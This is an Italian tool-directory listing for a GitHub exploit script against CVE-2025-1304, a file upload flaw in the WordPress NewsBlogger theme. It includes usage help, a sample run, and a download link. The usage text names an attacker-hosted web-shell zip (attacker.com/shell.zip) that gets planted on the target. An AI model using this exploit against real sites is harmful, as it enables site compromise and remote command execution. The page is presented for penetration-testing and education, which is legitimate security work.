Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1304 — Il tema WordPress NewsBlogger <= 0.2.5.1 è vulnerabile al caricamento arbitrario di file. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-1304
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-1304

CVE-2025-1304

Il tema WordPress NewsBlogger <= 0.2.5.1 è vulnerabile al caricamento arbitrario di file.

Vedi Repository
221 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Tema WordPress NewsBlogger <= 0.2.5.1 - Caricamento File Arbitrario (CVE-2025-1304)

Punteggio CVSS: 8.8 (Alto)
Tipo di Vulnerabilità: Caricamento File Arbitrario
Componente: Tema WordPress
ID CVE: CVE-2025-1304


🔥 Panoramica della Vulnerabilità

Il tema WordPress NewsBlogger (versioni <= 0.2.5.1) è vulnerabile a un Caricamento File Arbitrario tramite il pannello di benvenuto dell'amministrazione.

Questa vulnerabilità consente a qualsiasi utente autenticato — incluso chi dispone del ruolo minimo di Sottoscrittore — di caricare un archivio .zip dannoso contenente una web shell.
Il caricamento avviene tramite un campo URL del plugin non convalidato, che non verifica correttamente il contenuto o il tipo del file caricato.

Un attacco riuscito potrebbe portare al compromesso completo del sito web, inclusa l'esecuzione remota di comandi e l'escalation dei privilegi.


🧠 Dettagli dello Script

Questo script Python automatizza lo sfruttamento della vulnerabilità:

  • Accedendo con le credenziali amministrative fornite.
  • Estraendo dinamicamente il nonce dalla pagina di benvenuto vulnerabile.
  • Caricando un plugin remoto dannoso tramite l'endpoint AJAX vulnerabile.

⚙️ Istruzioni per l'Uso

python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 Esempio di Output

[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ Disclaimer

Questo codice è fornito esclusivamente per scopi di formazione e test di sicurezza autorizzati.
L'autore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo strumento.


Di: Nxploited ( Khaled Alenazi )

Scarica lo strumento